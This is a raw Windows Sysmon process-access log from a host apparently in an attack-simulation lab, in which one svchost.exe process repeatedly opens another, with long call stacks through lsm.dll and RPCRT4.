13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 